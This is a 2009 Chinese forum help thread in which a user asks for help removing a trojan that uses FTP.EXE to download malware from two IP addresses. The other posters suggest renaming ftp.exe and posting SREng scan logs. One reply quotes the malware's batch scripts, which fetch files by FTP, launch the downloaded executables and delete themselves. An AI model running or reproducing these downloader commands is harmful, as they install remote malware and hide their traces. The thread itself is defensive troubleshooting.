12345678   1  /  8  页   跳转

[求助] 帮我解决这个病毒

帮我解决这个病毒

附件: system32病毒.rar (2009-2-27 21:32:35, 34.44 K)
该附件被下载次数 228



定时从用FTP.EXE从 61.191.57.35    61.147.110.108  下载木马  我现在用防火墙把FTP.EXE禁止了!

      哎  烦啊    救救我吧!

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)
分享到:
gototop
 

回复:帮我解决这个病毒

第1个P处理
ftp -s:setuplp.sys
start C:\setuplp.exe
del setuplp.sys
del %0

第2
ftp -s:tencent.sys
start C:\tmd.exe
start C:\tmd.exe
del tencent.sys
del %0
  第3

ftp -s:yantou.sys
start C:\WINDOWS\\tcpsvr1.exe
start C:\WINDOWS\\tcpsvr2.exe
start C:\WINDOWS\\tcpsvr3.exe
del yantou.sys
del %0
最后编辑辉一般感觉 最后编辑于 2009-02-27 21:39:03
gototop
 

回复:帮我解决这个病毒

将ftp.exe文件更名即可。
gototop
 

回复 2F 辉一般感觉 的帖子

Sreng官方下载
SREng/智能扫描(记得勾选“检查进程的数字签名)
等扫描完成,保存日志(LOG格式)
PS:如主程序SREng**.exe无法运行,导致无法扫描日志
将主程序改名为我爱小狮子.bat
或我爱小狮子.scr
日志放入附件
(点击我这贴右下角的“引用”或最右下角的那个较大的“回复”然后就应该知道怎么发了。)
gototop
 

回复:帮我解决这个病毒

将ftp.exe文件更名即可。 ???  大哥!什么意思啊!  我用防火墙拦截了!现在应该更ftp.EXE  没有关系了把!
gototop
 

回复:帮我解决这个病毒

天知道。。。。。。。
日志发上来看看

你是什么防火墙?
gototop
 

回复:帮我解决这个病毒

瑞星 2009  杀毒 + 防火墙啊  !
gototop
 

回复:帮我解决这个病毒

日志贴上来

瑞星防火墙要+规则包
gototop
 

回复: 帮我解决这个病毒

  晕  自动运行  删了  不要好久又自动运行个CMD.EXE  就又有了
gototop
 

回复: 帮我解决这个病毒

附件: 扫描报告.log (2009-2-27 22:06:12, 74.03 K)
该附件被下载次数 191

  报告来了
gototop
 
12345678   1  /  8  页   跳转
页面顶部
Powered by Discuz!NT